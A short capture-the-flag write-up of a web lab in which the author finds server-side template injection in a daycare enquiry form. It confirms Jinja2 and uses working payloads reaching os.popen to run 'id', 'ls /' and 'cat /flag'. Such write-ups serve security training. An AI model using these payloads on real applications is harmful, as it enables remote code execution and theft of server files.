Sunnyside Daycare (SSTI)
Lab can be found at: https://webverselabs-pro.com/

We land upon a page which allows us to make an enquiry for a daycare spot. Seems like a good place to test.

Using the payload below gives us a good indication of what is happening here: server-side template injection.
{{7*7}}
We see 49 rendered on the page, which proves the payload is being evaluated rather than displayed.

Next, I try to render the string '7' seven times with the following payload:
{{7*'7'}}
It renders, which indicates that we are likely dealing with Jinja2. This article says that Jinja runs inside Python, so I began looking for an appropriate payload.

Just out of curiosity, I wanted to see if I could force an error, so I used {{ as my payload. This caused an internal server error (500), but debugging was off, so I did not get anything verbose:

Next, I found an article that used a Python payload to exploit this kind of SSTI, and I ran it in the name field:
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
With this, we essentially have RCE:

Next, I ran an ls command, which showed that the flag.txt file was in the root directory:
{{request.application.__globals__.__builtins__.__import__('os').popen('ls /').read()}}
So now I could simply cat the flag.txt file:
{{request.application.__globals__.__builtins__.__import__('os').popen('cat /flag').read()}}
Thanks for following along!